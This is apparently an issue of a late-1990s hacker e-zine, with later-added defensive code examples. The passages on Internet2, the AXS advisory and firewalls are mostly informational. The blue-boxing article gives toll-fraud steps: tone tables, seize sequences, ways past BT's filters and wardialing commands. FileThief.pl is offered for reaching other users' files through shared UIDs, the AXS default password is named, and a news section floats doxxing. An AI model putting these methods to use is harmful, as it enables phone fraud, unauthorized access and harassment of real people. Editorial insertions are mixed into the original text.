      The vBNS serves as a backbone for both the NGI and i2 initiatives. The
      vBNS uses IP over ATM over SONET. It operates at speeds up to OC-48
      (2.5gbps). MCI also created a second "testnet" network for testing
      experimental technologies until they prove stable for implementation on
      the vBNS. Most peers connect at DS3 and OC-3 speeds to one of the vBNS
      NAPs (Network Access Points) or to a GigaPOP that is already plugged up
      to a NAP. The vBNS supports both native and tunneled IPv6.
      
      > Abilene
      The Abilene network was created by UCAID in collaboration with Qwest
      Communications, Cisco, Nortel Networks and a few others that I don't
      remember. It was created for the sole purpose of connecting i2 peers and
      operates at speeds up to OC-48 using IP over SONET. As I remember, the
      lines were laid and POPs put in place by Qwest Communications. If you
      want to connect to the Abilene backbone all you need is $110k a year for
      an OC-3 connection, or $320k a year for an OC-12. Small price to pay :]
      
      > ESNet
      ESNet (Energy Science Network), headed by the DoE (Department of Energy),
      provides speeds up to OC-12. It connects directly to the vBNS, STARTAP
      and many other high speed US backbones. Peers connect at anywhere from
      64k up to OC-12 speeds. It has been around for a while and has a lot of
      networks connected to it. For more information check out: www.es.net
      
      > International networks
      It was in 1997 that the NSF started taking proposals from R&D
      networks in other countries to add International peers to its registrar
      for the vBNS. I guess the US GOV and academic establishments realized
      that the US wasn't exactly the smartest country on the planet. The
      International peers connect through the STARTAP and connect from there to
      other i2 or NGI peers. STARTAP (Science, Technology, And Research Transit
      Access Point) is the International NAP for most US networks (other than
      the Internet). The STARTAP connects directly to the Ameritech NAP in
      Chicago, which connects to the vBNS and many other high speed US networks.
      The STARTAP is funded by the NSF and maintained by the University of
      Illinois at Chicago and a few other Chicago based groups. The STARTAP
      currently supports speeds up to OC-12 and supports DiffServ, RSVP,
      Multicasting and IPv6. For more information on the STARTAP check out:
      www.startap.net
      
      The following are just a few examples of International networks that are
      hooking up to i2 or NGI through the STARTAP.
      
      >> Israel's tap
      The Israeli government has committed $10 million a year for the next four
      years towards advanced network development in Israel. The group in charge
      of all i2 and NGI activities is the IUCC (Israel Inter-University
      Computation Center) whose main members are the eight major universities
      in Israel. This is where it will start, with the Universities, and then
      shortly after it should be open to commercial R&D departments.
      There is one Satellite link at 44mbps from Israel (Tel Aviv University)
      to the STARTAP in Chicago US. Israel bought the entire spectrum on the
      sat so there are plans for upgrading that speed anywhere from 60mbps to
      140mbps, as needed. There is also a fiber optic E3 (34mbps) line from
      Israel (Bar Ilan U. I believe) to the UK where it connects to the QUANTUM
      network in Europe  (http://www.dante.net/quantum).  After that there is
      another fiber optic line going from the connection point in the UK over
      to the US at 10mbps for redundancy.
      
      I've heard rumors of a 2gbps line being setup from the US to Israel but I
      have not been able to confirm this.
      
      Though the i2 website for the IUCC claims full support for QoS, I don't
      believe it. At an i2/NGI conference I went to I asked one of the IUCC
      speakers about this and he gave no real assurances for QoS support, quite
      the opposite.
      
      For more information on the i2 project in Israel go to
      www.internet-2.org.il
      
      >> CA*NET3
      CA*NET3 currently runs at OC-48 (2.5gbps). The Canadian government, in
      partnership with some High Tech companies, funds the project. NAPs to the
      backbone are located all along the southern border of Canada and connect
      to other US networks through the STARTAP. The Canadian Government has
      committed $53 million to the project, which will last a year or so (don't
      remember the exact figures). The project was initiated in 1998. CA*NET3
      uses DWDM (Dense Wavelength Division Multiplexing) to get to OC-48.
      CANARIE (Canadian Network for the Advancement of Research, Industry and
      Education) is the group in charge of the project; for more info check
      out their site at: www.canarie.ca or www.canet3.net. The CANARIE
      consortium includes commercial, academic and governmental departments of
      Canada.
      
      IV. Security concerns
      ------------------------------------------------------------------------
      There are a couple of security concerns as I see it. The first is about
      the way most universities and organizations make requests to plug up to
      i2 or NGI. They create a proposal and many will list, in great detail,
      the details of their network. One sad sight I saw was the San Diego
      Supercomputer Center which posted a map of all the IP NetIDs for its
      network. Even worse was CANARIE which posted the same thing (the NetIDs)
      for the entire CA*NET3 backbone. Now, these are private networks.
      However, all I would need, in theory, is a terminal at an i2 or NGI peer
      to start playing around. It seems even easier when I start to really look
      at their proposals. Most peers make the default path their NGI or i2
      connection when the destination is another i2 or NGI peer, even for
      something as simple as a webpage. So, depending on how it is implemented
      I may be able to just start from a simple Student terminal, as opposed to
      having to hack into the Systems group terminals or servers first.
      The second is concerning DoS attacks. Give me bandwidth and I'm in DoS
      heaven :) On an i2 or NGI peer's network I may have a lot of bandwidth at
      my disposal (depending on what type of policy they come under when
      connecting to i2 or NGI backbones). Then, if I find a peer stupid enough
      with a proxy from there to the normal Internet, who knows.
      And I'm only a nominal security buff; I imagine that there are a lot more
      concerns that I haven't seen. There is, however, an IETF Security
      Workgroup in place for this exact reason. So, who knows?
      
      
      
      If you have any questions, comments, corrections... 
      e-mail me at: mindmore@mindless.com
      
      I will try to post any technical corrections in the next issue of this
      e-zine.
      
      - Cyphunk
      
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      ------------------------------------------------+
                                                      |
      -------------------------------------           |
      AXS Script Makes WebServer Vulnerable           |
      -------------------------------------           |
                                                      |
      --- by f0bic - [ linux security ]               |
      --- f0bic@deadprotocol.org                      |
      (this article was also published on BugTraq)    |
      ________                                        |
              [_______________________________________|
      
      
      -----------------
      Brief Description
      -----------------
      The AXS webserver script by Fluid Dynamics (www.xav.com) allows unauthorized third party
      users to make use of the ax-admin Administration/Configuration module and remotely edit and/or
      delete log files and overwrite files on the system. Compromise of system resources might also
      be one of the effects of this vulnerability.
      
      
      --------------------
      Vulnerable Platforms
      --------------------
      Any operating system AXS is compatible with.
      
      
      - *NIX Operating Systems (AXS cgi set)
      
      - WindowsNT Operating System (AXS perl set)
      
      I have seen the AXS
      ( cgi set ) operate on Apache 1.2.6/1.3.3, NCSA, Netscape-Commerce.
      ( perl set ) operate on IIS 3.0/4.0, Netscape-Fasttrack.
      
      
      -------------------------
      Vulnerability Description
      -------------------------
      The AXS script is a cgi or perl script that keeps track of the number, the source
      locations and the client info of visitors to your http port (80). It writes this data to an output
      file, named log.txt by default (but it can easily be relocated). This log.txt is normally
      located in the cgi-bin directory of the server, which means the web server has write access to
      that directory.
      
      The AXS cgi set contains two files with the .cgi extension: ax.cgi and ax-admin.cgi respectively.
      The ax.cgi file is the one that actually "grabs" the info about the visitors and then writes
      it to log.txt (or wherever you relocated this to). The ax-admin.cgi is the configuration
      file for the ax.cgi script. The ax-admin.cgi is protected by the default password "IronMan" and sometimes
      the password is even left blank. Due to this weak access security it is very easy to gain "configuration access"
      to the ax.cgi script, allowing you to reconfigure it, delete the log files, or change the location of the logs.
      
      The default location for the AXS script is http://www.server.com/cgi-bin/ax.cgi.
      The default location for the AXS Admin script is http://www.server.com/cgi-bin/ax-admin.cgi.
      
      To obtain access to the ax-admin.cgi module you are issued a password screen by default, IronMan
      being the default password. The password is determined by the characters in the $password="*"
      field of the ax-admin.cgi source ("*" being the default/chosen password or a blank). Most of the
      time I have seen the password field left blank or at the default. If the password is left blank you
      will not be prompted for a login screen; instead it will automatically drop you into the ax-admin
      configuration page. From this point on you can alter files on the server system, possibly resulting
      in Denial-of-Service attacks against the system's resources.
      
      
      
      ---------
      Solutions
      ---------
      The AXS problems stem from a lack of the safeguards that a secure business application would need.
      The AXS script, on the other hand, has been developed for ease of use, not with security in mind;
      this is one of the mistakes that Fluid Dynamics has made. The easy fix is not to run the ax-admin.cgi
      module with a blank or default password. I have informed Fluid Dynamics about the fact that I
      have seen servers where the ax-admin password was the same as the one for a valid shell account on
      that system. Fluid Dynamics has also gone through no trouble at all to encrypt any of the passwords
      used in the ax-admin verification.
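
      Added here as an example, not part of f0bic's advisory: since ax-admin.cgi
      ships with a known default password, an administrator who cannot change
      it right away can at least watch the access log for it. The Python below
      parses Common Log Format lines and flags successful requests to
      ax-admin.cgi from hosts outside an assumed ADMIN_HOSTS allow-list; the
      log lines, addresses and the allow-list itself are constructed for the
      example.

```python
"""Spot requests to the AXS admin module in a web server access log.

Added example, not part of the advisory: a small Common Log Format
parser plus a check that flags successful (2xx) requests to
ax-admin.cgi from hosts that are not on the administrator allow-list.
All log lines, hostnames and addresses below are constructed samples.
"""
import re
from collections import Counter

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample log (Common Log Format); the addresses are from the
# documentation ranges and do not belong to any real host.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2000:03:12:01 +0000] "GET /index.html HTTP/1.0" 200 2326
192.0.2.10 - - [10/Apr/2000:03:12:05 +0000] "GET /cgi-bin/ax.cgi HTTP/1.0" 200 43
192.0.2.10 - - [10/Apr/2000:03:13:00 +0000] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 200 5120
198.51.100.7 - - [10/Apr/2000:03:14:22 +0000] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 200 5120
198.51.100.7 - - [10/Apr/2000:03:14:40 +0000] "POST /cgi-bin/ax-admin.cgi HTTP/1.0" 200 310
203.0.113.9 - - [10/Apr/2000:03:20:00 +0000] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 401 0
203.0.113.9 - - [10/Apr/2000:03:20:30 +0000] "GET /stats/ax-admin.cgi?action=config HTTP/1.0" 200 5120
"""

# Assumed: the only host that should ever touch the admin module.
ADMIN_HOSTS = {"192.0.2.10"}


def parse_clf(line: str):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def is_axs_admin_request(path: str) -> bool:
    """True for ax-admin.cgi in any directory (the script can be relocated)."""
    return path.split("?", 1)[0].endswith("/ax-admin.cgi")


def find_unauthorized_admin_access(log_text: str, admin_hosts=ADMIN_HOSTS):
    """Return the entries where ax-admin.cgi answered 2xx to a non-admin host."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_clf(line)
        if entry is None or not is_axs_admin_request(entry["path"]):
            continue
        if entry["status"].startswith("2") and entry["ip"] not in admin_hosts:
            hits.append(entry)
    return hits


def summarize(hits) -> Counter:
    """Count offending requests per client address."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_unauthorized_admin_access(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["status"]}')
    print(summarize(found))
```

      The path check looks at the file name rather than the whole path because
      the advisory notes that the script can be relocated out of cgi-bin; the
      401 line is deliberately ignored, since a rejected login is not a
      successful use of the module.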
      
      
      EOF
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      
      +--------------------------+
      | PURSUiT presentation,    |
      |                          |
      |     Boxing in the UK     |
      |                          |
      |         By Oktal         |
      |                          |
      |     <ms@punkass.com>     |
      +--------------------------+
      
      Part 1. Blue Boxing
      
      Part 2 will be on Beige Boxing and will be in the issue 3 of PURSUiT
      
      Blue boxing is sending noises down a fone line to seize the trunk and make
      free fone calls (among other things). The trunk is where operators dial from.
      But they don't use the same frequencies as home fones, so we need to get
      the tones from your soundcard to the fone line.
      
      What you will need for this hobby:
      
      1 Computer + Sound card
      1 Tone-generating software (eg. http://x-iz.net/gbh/bluebeep.zip)
      1 Cheap telephone (I use the old 'Viscount' series by BT because I have a
              friend who has loads he doesn't want)
      4 Wires (at least 1 metre each)
      2 2.5mm jack plugs (from your local electrical shop)
      1 Hole-making equipment (hammer+nail)
      1 Soldering iron + solder (optional)
      
      What you must do for this hobby:
      
      Open up the handset so you can see all the insides. There should be a
      speaker and a microphone, each with 2 wires connecting into them.
      Attach (or solder) one of your 4 wires to each of the wires in the handset.
      Now make a hole in the casing for the wires to emerge from.
      Open up the jack plugs and attach the 2 wires from the speaker to the
      connections in one plug and and 2 wires from the mic to the connections
      in the other plug. Use solder if you want. Stick the handset back together.
      
      Disconnect the speakers and microphone from your computer and plug the
      earpiece into the microphone socket and the mouthpiece into the speaker
      socket.
      
      -OR- If you have electrical knowledge, you could make a box that generates
      the tones by itself and doesn't need connection to a soundcard.
      
      
      
      A long time ago, BT had a tone (2280hz) which was used by BT engineers to
      access certain functions within the trunk. Phreakers discovered that this
      could be abused to seize the trunk and make free calls out of it. But BT
      got wise to the phreakers so now blue boxing is impossible in the UK.
      But BT does have 'country direct' lines which are freefone 0800 numbers to
      overseas. They are mostly in the 0800 890 XXX range along with some other
      useful numbers. These countries' exchanges are not as modern as here and they
      are blue boxable. (NB: not all country direct lines are boxable)
      
      
      Some country direct numbers to countries with CCITT-5 lines:
      South Africa   0800 890 027
      Germany        0800 890 049
      Brazil         0800 890 055
      Chile          0800 890 056
      Libya          0800 890 059
      Australia      0800 890 061
      Indonesia      0800 890 062
      France         0800 890 133
      Bahamas        0800 890 135
      Gabon          0800 890 241
      etc etc etc
      
      You can then make an international call out of that country
      to the UK (or any other country) and make a free call.
      
      
      
      Using Bluebeep by Onkel Dittmeyer:
      
      The 'action mode' sucks so you should program a script to play the
      tones. A sample (and very good) script that I made is included in
      the zip file (http://x-iz.net/gbh/bluebeep.zip)
      To make your own script to your own needs, read 'Script Language'
      from the Info|Documentation menu.
      To run a script, type BLUEBEEP /EXEC FILENAME.EXT from the prompt.
      For a list of all the command-line switches, type BLUEBEEP /?
      
      
      Tone specifications for the CCITT-5 exchange:
      
      Description         Frequency (Hz)      Duration (ms)   Pause after tone (ms)
      
      digit 1             700  & 900          60              40
      digit 2             700  & 1100         60              40
      digit 3             900  & 1100         60              40
      digit 4             700  & 1300         60              40
      digit 5             900  & 1300         60              40
      digit 6             1100 & 1300         60              40
      digit 7             700  & 1500         60              40
      digit 8             900  & 1500         60              40
      digit 9             1100 & 1500         60              40
      digit 0             1300 & 1500         60              40
      KP1                 1100 & 1700         80              40
      KP2                 1300 & 1700         80              40
      ST                  1500 & 1700         80              80
      Clear Ahead Tone    2400 & 2600         150             30
      Seize Tone          2600 & 2600         80              20
      
      Be aware that duration times may differ slightly with the exchange.
      
      To seize the trunk of a CCITT-5 line:
      
      1. You will hear a bleep after you dial the country direct number
      2. Send the clear ahead tone after that bleep (makes it think you've hung up)
      3. Then send the seize tone (so it thinks it's talking to the telco equipment)
      4. You will hear a bleep and a chunk
      5. Dial the number as shown:
          KP2+Zero+CountryCode+AreaCode+Number+ST
        eg. KP2,0441818118181,ST
      
      But BT often put filters on the country direct lines to filter out
      these tones. Here are some tricks to get past a lot of filters:
      
      The average tone of a conversation is around 3000 Hz. This is called
      'pink noise'. Bluebeep allows 3 simultaneous tones, so add 3000 Hz
      to the last frequency of each tone in the dial set list.
      
      Some filters raise or lower the pitch of the sound slightly.
      Try tones just above or just below the given frequencies.
      (eg. 2395 or 2405 instead of 2400)
      You may have to do some frequency analysis on the echo you get from the system.
      A good tool for this is Wintone (30-day trial version at www.steaksandwich.com,
      registration $20 (£13), or you could read my article on cracking software,
      which will be coming soon in PURSUiT)
      
      
      That's it guys. Any information you may have on UK boxing can be sent to
      ms@punkass.com for a great big essay I have planned for the mag next year
      on UK boxing. Remember part 2 of this article (beige boxing) is in issue 2.
      
      
      Wardialling & Scanning
      
      If a country direct number is abused too much then BT is forced to
      shut it down :(
      So every so often the one you use will go away and you'll have to
      use another. Well, the list above is by no means complete. And there
      are other very useful numbers in the 0800 890 XXX range, so...
      
      Why not find out what they all are?
      "What, scan 1000 numbers???"
      No... you get a wardialler to do that for you. It dials them all up
      (don't do this all at once, BT'll notice) and when you come back
      it'll tell you which ones picked up and which ones didn't exist.
      (it might also tell you if it was a data or voice line)
      Then you can dial the ones that look interesting.
      You just tell it what range to scan and leave it for a while.
      You could also be at your desk while the dialler is running so you
      can listen to them and take note of what the voice ones are, like
      "voice: "Mark at reception how may I help you?"
      A good wardialler is ToneLoc at http://x-iz.net/gbh/toneloc.zip
      
      
      Example ToneLoc Syntax:
      
      C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /S:3:00a /E:4:00a
      will dial 0800890000, 0800890001, 0800890002... 0800890999
      starting at 3 am and ending at 4 am (regardless of how far thru the
      scan it has got)
      C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /H:1:00
      will scan the range starting NOW and ending in one hour
      
      Toneloc also has some cool options like Black Book; A txt file of
      numbers to NEVER dial (eg. 999) during a scan and loads of other cool stuff.
      To setup options like that and config stuff like modem strings, run
      TLCFG.EXE
      
      A really neat trick is the Scan Map. I can't explain it, it is just
      so great. Run TONEMAP SAMPLE.DAT to see what I mean.
      
      
      
      EOF
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      
      *-------------------------------*
      | PURSUiT is proud to present.. |
      |                               |
      |   Introduction to Firewalls   |
      |                               |
      |          By deadline          |
      *-------------------------------*
      
      
      What is a firewall?
      ---------------------
      A firewall is a system or group of systems that enforces an access control
      policy between two networks. The actual means by which this happens
      varies widely, but in principle, the firewall can be thought
      of as a pair of mechanisms, one that is there to block traffic, and the
      other which permits traffic. Some firewalls place a greater
      emphasis on only blocking traffic, while others are strictly for permitting traffic.
      
      Diagram:
      
      O = Outside Host        1: packets to the firewall
      F = Firewall/Router     2: firewall accepts or denies
      I = Internal Network    3: packets go to host
      
                         (3) IIII
                       |-----IIII
                  (2)  |
           (1)   FFFFF-| (3)
      OOOO-------FFFFF-------IIII
      OOOO       FFFFF-|     IIII
                       | (3)
                       |-----IIII
                             IIII
      
      Protection
      --------------
      Firewalls offer protection against many kinds of things. They offer
      protection from malicious packets, e-mail spam/bombs, and also intruders
      to your system. But there are also attacks firewalls CANNOT protect you
      against (attacks that don't go through the firewall), like people from
      inside the network who, from there, can give access to outside
      networks, which can be potentially dangerous to your network. And
      lastly, firewalls can't protect against tunneling over application
      protocols to trojaned or poorly written clients.
      
      Types of Firewalls
      --------------------
      
      1: Network Layer
      ------------------
      Network firewalls usually make their decisions based on the (source)
      address and the ports of a packet. Routers are probably the best known
      network level firewall, because a router is not able to make a detailed
      decision about where the packet is actually going or where it came from.
      Newer network firewalls have improved greatly at maintaining information
      about the packets that pass through them, the contents of data streams,
      and other sources of information. An important thing to remember is that
      network firewalls route traffic directly through them, so to use one you
      usually need to have a validly assigned IP address block. Network
      firewalls are usually fast and transparent to users.
      
      
      2: Application Layer
      ----------------------
      Application level firewalls are usually hosts running proxy servers.
      The proxy server usually permits no traffic directly between networks
      and gives a more detailed log of traffic than network level firewalls.
      These firewalls can be used as network address translators, since packets
      go "in one side and out the other" after passing through an application
      that effectively masks the origin of the initiating connection.
      
      
      Proxy Servers
      ---------------
      A proxy server is an application that mediates traffic between a protected
      network and the Internet, meaning it only allows specific connections to
      connect to the host, and allows only connections out of the host through
      specified ports. Proxies are usually used instead of router based traffic
      controls because they prevent traffic from passing directly between two
      networks. A lot of proxies have more logging and support for user
      authentication. Because proxies must understand the application protocol
      being used, they can also implement protocol specific security, whereby
      only certain protocols are allowed to be incoming and outgoing from a host.
      
      
      Firewall Downsides
      --------------------
      Firewalls, while restricting access from outside attacks, also restrict
      users inside the network from connecting to some, or maybe even all,
      networks outside the current one. This means a user in the secure network
      may not be able to connect to, let's say, www.linux.org unless he has the
      permission to. The same applies to ftp, telnet, and various other network
      utilities.
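The decision step (2) in the diagram, the "block" and "permit" mechanisms, and the egress restriction described under Firewall Downsides can all be seen in a small packet filter. The following is an added example written for this edition, not code from the original article or from any firewall product; the rule set, the 192.0.2.0/24 "inside" network and every address and port in it are constructed (RFC 5737 documentation ranges). It goes slightly beyond the text by keeping a connection table, which is the kind of state the newer network firewalls the article mentions maintain.

```python
"""Toy packet filter illustrating the network-layer firewall described above.
Added example, not code from the original article; every address and port
is constructed (RFC 5737 documentation ranges), not a real site."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Set, Tuple

INTERNAL = ip_network("192.0.2.0/24")   # constructed "I" network from the diagram


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    proto: str = "tcp"


@dataclass
class Rule:
    action: str                   # "permit" or "deny"
    src: str = "0.0.0.0/0"        # CIDR the source address must fall in
    dst: str = "0.0.0.0/0"        # CIDR the destination address must fall in
    dport: Optional[int] = None   # None matches any destination port
    proto: Optional[str] = None   # None matches any protocol

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.dport is None or self.dport == p.dport)
                and (self.proto is None or self.proto == p.proto))


class Filter:
    """First-match rule evaluation with a default-deny policy, plus a small
    connection table so replies to connections opened from inside are let
    back in (the 'maintaining information about packets' the text mentions)."""

    def __init__(self, rules: List[Rule], default: str = "deny"):
        self.rules = rules
        self.default = default
        self.conns: Set[Tuple[str, str, int, int, str]] = set()

    def decide(self, p: Packet) -> str:
        # A reply to a flow we permitted earlier has src/dst and ports swapped.
        if (p.dst, p.src, p.dport, p.sport, p.proto) in self.conns:
            return "permit"
        for r in self.rules:          # step (2): first matching rule wins
            if r.matches(p):
                if r.action == "permit":
                    self.conns.add((p.src, p.dst, p.sport, p.dport, p.proto))
                return r.action
        return self.default           # nothing matched: default policy


RULES = [
    Rule("permit", dst="192.0.2.10/32", dport=25, proto="tcp"),  # inbound mail to the mail host
    Rule("permit", dst="192.0.2.10/32", dport=80, proto="tcp"),  # inbound web to the same host
    Rule("permit", src=str(INTERNAL), dport=80, proto="tcp"),    # inside users may browse the web
    Rule("permit", src=str(INTERNAL), dport=53, proto="udp"),    # ... and resolve names
    # Everything else, in either direction, falls through to the default deny.
]


def run_sample() -> List[str]:
    """Push a few constructed packets through the filter and return the verdicts."""
    fw = Filter(RULES)
    sample = [
        Packet("203.0.113.5", "192.0.2.10", 40000, 25),    # outside -> mail host: permitted
        Packet("203.0.113.5", "192.0.2.10", 40001, 23),    # outside -> telnet: no rule, denied
        Packet("203.0.113.5", "192.0.2.55", 40002, 80),    # outside -> a workstation: denied
        Packet("192.0.2.55", "198.51.100.7", 51000, 80),   # inside -> web: permitted and tracked
        Packet("198.51.100.7", "192.0.2.55", 80, 51000),   # the reply: allowed from the table
        Packet("192.0.2.55", "198.51.100.7", 51001, 21),   # inside -> ftp: the 'downside', denied
    ]
    return [fw.decide(p) for p in sample]


if __name__ == "__main__":
    for verdict in run_sample():
        print(verdict)
```

The last packet is the downside the article describes: the inside user's ftp session is dropped not because anyone wrote a rule against it, but because nobody wrote a rule for it, which is what a default-deny policy means in practice.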
      
      
      EOF
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      
      ]--------------------------------[
      [ FileThief.pl                   ]
      ]--------------------------------[
      [ Developed By                   ]
      ]--------------------------------[
      [ Mister-X (Admin@x-iz.net)      ]
      [ Alkatraz (funnet@icom-web.com) ]
      ]--------------------------------[
      
      For those of you who can't tell what this script does by looking at the
      source code: it scans /etc/passwd for users with the same UID as your own.
      If it finds them it reports to STDOUT and logs to a file, for later browsing.
      Yes, it is a common occurrence for slack admins to add users with the same
      UID, meaning that you have full access to their files.
      
      PERL Script Follows:
      
      #!/usr/bin/perl
      # Look up our own account by real UID: name, numeric UID and home directory.
      # (getpwuid($<) also works without a controlling tty, where getlogin is undefined.)
      ($myusr, undef, $id, undef, undef, undef, undef, $hdir) = getpwuid($<);
      $fid = time."-$id";            # unique suffix for this run's log file
      print "Welcome to filethief - searching for $id in /etc/passwd.\n";
      $found = 0;
      open(logf, ">>$hdir/filethief-$fid.log") or die "cannot open log: $!";
      open(pwd, "</etc/passwd") or die "cannot read /etc/passwd: $!";
      while(<pwd>) {
        # passwd(5) fields are colon separated: name, password, UID, rest
        my($usr, undef, $uid) = split(/:/, $_, 4);
        if(($uid eq $id) && ($usr ne $myusr)) {   # same UID, different account name
          $found++;
          print logf "$usr has the same ID as $myusr ($id).\n";
        }
      }
      close(pwd);
      if($found == 0) {
        print logf "\nNo matches were found at ".localtime(time)."\n";
      } else {
        print logf "Found [$found] matches at ".localtime(time)."\n";
      }
      close(logf);
      # Replay the log file to STDOUT so the results are shown immediately as well.
      open(logf, "<$hdir/filethief-$fid.log") or die "cannot reopen log: $!";
      while(<logf>) { print; }
      close(logf);
      exit(1);
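Seen from the administrator's side, the same condition is an audit finding: any UID shared by two accounts gives each full access to the other's files. The block below is an added example written for this edition, not the FileThief script above and not from its authors; it generalises the check to report every UID collision in a passwd-format file rather than only collisions with the caller's own UID, and it singles out UID 0, since a second root-equivalent account is the collision most worth finding. The passwd text embedded in it is constructed, not from a real host.

```python
"""Duplicate-UID audit over passwd(5)-format text. Added example, not the
FileThief script; the SAMPLE_PASSWD text below is constructed."""
from collections import defaultdict
from typing import Dict, List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/sh
bob:x:1001:1001:Bob:/home/bob:/bin/sh
carol:x:1000:1000:Carol:/home/carol:/bin/sh
# comment lines and blank lines are ignored

toor:x:0:0:second uid-0 account:/:/bin/sh
broken line without fields
"""


def parse_passwd(text: str) -> List[dict]:
    """Parse passwd(5) lines: name:passwd:uid:gid:gecos:dir:shell.
    Malformed lines are kept as error records so the audit can report them."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            entries.append({"line": lineno, "error": raw})
            continue
        entries.append({"line": lineno, "name": fields[0], "uid": int(fields[2]),
                        "gid": int(fields[3]), "home": fields[5], "shell": fields[6]})
    return entries


def shared_uids(entries: List[dict]) -> Dict[int, List[str]]:
    """Map each UID used by more than one account to the account names."""
    by_uid = defaultdict(list)
    for e in entries:
        if "uid" in e:
            by_uid[e["uid"]].append(e["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def audit(text: str) -> List[str]:
    """Return one finding per problem, most severe first."""
    entries = parse_passwd(text)
    dupes = shared_uids(entries)
    findings = []
    if 0 in dupes:   # extra root-equivalent accounts come first
        findings.append("CRITICAL: UID 0 shared by " + ", ".join(sorted(dupes[0])))
    for uid in sorted(u for u in dupes if u != 0):
        findings.append(f"WARNING: UID {uid} shared by " + ", ".join(sorted(dupes[uid])))
    for e in entries:
        if "error" in e:
            findings.append(f"NOTICE: line {e['line']} malformed: {e['error']!r}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD):
        print(finding)
```

Run against a real file with `audit(open("/etc/passwd").read())`; the parser deliberately does not use the pwd module so the same code can be pointed at a copy of the file taken from another host during an investigation.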
      
      
      
      EOF
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
                       iuuiuuiu
                      uiuiu    uiu    i      I       I
                        iu      uiu    yi   BI       BI
                        iu     uiu  i   yi  I        BI
                        iu     ui   yi   yi          BI
                       uiuuiuui  y   yi  yi          BI
                        iuu     yi    yi iyi        BIB
                        iu      yi     yiyi  BI    BI BI
                        iu      yi      yi    BIBIBI  BI
                        uiu
                                  [ PURSUiT News Update ]
      
      
      Well after all, that's the first issue of PURSUiT, so we have 
      no news to talk about, so we will use this space for ideas, 
      future features and other things.
      
      Stuff we had on mind:
      ---------------------
      
      1. Lamer list
         This was the idea of one of us, just to take out rage on people
         that keep on bugging us, or just for the fun of it. If we will
         include it in the future, I believe it won't be serious, just to
         have some laughs the night after it on IRC ;)
      
      2. Shouts
         It's my idea mostly, though I think it won't be included. If it 
         will, we will probably use it to thank people who helped putting
         out the zine, reviewed it, made some corrections etc.
      
      3. Docs exposing
         Now this idea came through an anonymous source, which suggested
         that PURSUiT could drop docs of a few people here and then. The 
         people we had on mind are mostly the ones that everyone hates,
         (I won't declare them here :) but we first need to get the docs,
         so it might not go.
      
      4. Questions\Answers section
         This is mostly self-explanatory, a section or column, where people
         will be able to email us and we will answer the question over
         the zine, so that other people could know the answer too. If we 
         will get enough response for that, we might do it.
      
      
      That's it for now, if you have other suggestions, ideas, or features
      you believe we should include, just email us to:
              
              bxj - <bxj@mail.com>
              f0bic - <f0bic@deadprotocol.org>
      
         
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      ][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
      iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
